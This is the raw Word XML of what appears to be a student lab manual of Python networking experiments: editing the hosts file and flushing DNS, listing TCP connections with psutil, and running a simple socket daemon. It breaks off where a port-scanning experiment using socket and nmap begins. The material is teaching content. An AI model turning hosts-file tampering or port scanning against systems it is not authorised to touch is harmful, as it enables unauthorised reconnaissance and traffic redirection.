    <w:p w14:paraId="0C43C25C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1560" w:right="1849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print("[SUCCESS]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DNS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cache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flushed.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Changes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applied.") except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E83FE18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print(f"[ERROR]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flush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DNS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cache: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{e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B79AD0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BAEAF7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_name_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"_main_":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD4D190" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1560" w:right="34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Read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display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file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>read_hosts()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E782DE4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638586F3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1560" w:right="486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2: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hosts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file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>modify_hosts()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149713B0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="156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3: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Flush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DNS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cache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apply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changes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>restart_network()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB00A3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B41B73" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="668DC107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67330780" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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2BB3B129" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A04ECF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network_config.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC17AA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2124C501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1AA66E97" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="606"/>
        </w:tabs>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="606" w:hanging="24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6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reads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7DED454F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="606"/>
        </w:tabs>
        <w:ind w:right="1003" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Modifications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made,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restarting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networking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288D938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01F404" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="600"/>
        </w:tabs>
        <w:spacing w:before="78"/>
        <w:ind w:left="360" w:right="627" w:firstLine="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TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>daemons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system using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>psutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FAF98C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07443D44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5FEEFF2A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="247" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="426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analyzes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>daemons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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system using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>psutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBFE790" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="266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53238270" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="144FD7BC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561400F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9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psutil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library</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5876E4DE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6436F542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2B6BD24C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="626F87F9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Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC0378B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90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command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481FB267" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="9"/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12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>psutil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2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BEA45" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B270C2A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psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240AA2D2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="49"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47150A8F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TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Daemons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D42F99A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6E40C4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="280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tcp_daemons.py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4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TCP/IP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daemons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B78567" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="272" w:lineRule="exact"/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list open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connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4085B754" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D6F578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psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2593E246" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355C5D90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list_tcp_connections():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337E37C1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psutil.net_connections(kind='tcp'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2DA3CF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="1080" w:right="783" w:firstLine="960"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print(f"PID: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{conn.pid},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Local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{conn.laddr},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Remote Address: {conn.raddr}, Status: {conn.status}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF1F49F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="180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list_tcp_connections()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564248FC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47F6C17D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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and verify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connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6069BF5C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DF1C4A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="1"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314D23FE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>◻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analyzes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TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>daemons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776A8A55" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exac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49CE86" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="600"/>
        </w:tabs>
        <w:spacing w:before="81" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="963" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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Python-based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daemon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logs incoming connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2384B709" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356E8B45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6CE195FA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783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Python-based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daemon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logs incoming connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254395B4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD2D3DD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2F1684F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0DF82D6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0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socket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library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14:paraId="04F3C129" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="276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16460076" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168C7C0C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Daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F8F49" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A89C78" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88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network_daemon.py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listen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0D875CDF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88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code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02901C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="065F4563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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF597D2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225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start_daemon(host='0.0.0.0',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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>port=5000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCE173F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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server_socket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socket.socket(socket.AF_INET,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socket.SOCK_STREAM) server_socket.bind((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5EC26D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1560" w:right="45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server_socket.listen(5) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print(f"Listening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{host}:{port}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5590B6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"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True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D6A0A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client_socket,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client_address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server_socket.accept() print(f"Connection received from {client_address}") client_socket.sendall(b"Hello! You are connected.\n") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>client_socket.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F9C5E4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="180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start_daemon()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D29A7E0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021A135F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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and 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 listens on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the specified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3D65D291" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="7"/>
        <w:ind w:left="1079" w:hanging="35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connecting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telnet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or another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device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064BE138" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="276"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280BD1F9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>◻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daemon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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688312E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exac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77F7EA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="600"/>
        </w:tabs>
        <w:spacing w:before="78"/>
        <w:ind w:left="600" w:hanging="240"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Develop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target machine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rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>socket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5"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E8C00" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:spacing w:val="-57"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD941F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Experiment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using socket and nmap Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2844F9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EAEAE2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Aim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041C58E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="360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 xml:space="preserve">using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-58"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6644B02D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-57"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74279525" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="275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2D91B4BD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="274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49CF79B9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>socket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library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14:paraId="377D777D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="279" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>python-nmap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library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scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635DC29C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="271" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
